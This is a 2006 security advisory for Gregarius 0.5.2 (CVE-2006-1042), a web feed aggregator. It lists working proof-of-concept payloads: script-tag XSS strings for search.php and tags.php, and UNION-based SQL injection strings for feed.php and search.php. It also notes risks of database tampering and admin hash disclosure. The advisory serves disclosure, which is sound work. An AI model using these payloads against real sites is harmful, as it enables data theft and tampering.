Gregarius 0.5.2 XSS and SQL Injection Vulnerabilities

2006.03.05

Credit: tzitaroth gmail com

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2006-1042

CWE: CWE-89

CVSS Base Score: 6.4/10

Impact Subscore: 4.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: None

http://gregarius.net/
Gregarius is a web-based RSS/RDF/ATOM feed aggregator, designed to run on your web server, allowing you to access your news sources from wherever you want.
XSS in search.php:
search.php?rss_query=<script>alert(1)</script>&rss_query_match=exact
XSS in tags.php:
tags.php?tag=<script>alert(1)</script>
SQL Injection in feed.php:
feed.php?folder=3 and 1=1 UNION select title from item--
with magic_quotes=off:
SQL Injection in search.php:
search.php?rss_query=aa%')) UNION select null,null,null,null,null,null,null,null,null,null,null,title,null from item-- &rss_query_match=exact
On Gregarius 0.5.2/PostrgreSQL this could lead to damaging/altering the DB and possible local file disclosure due to not properly sanitized $lang include, on early 0.5.3 svn version to admin hash disclosure.
More XSS and SQL Injections in admin section.
Fixed in latest 0.5.3 svn.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Gregarius 0.5.2 XSS and SQL Injection Vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.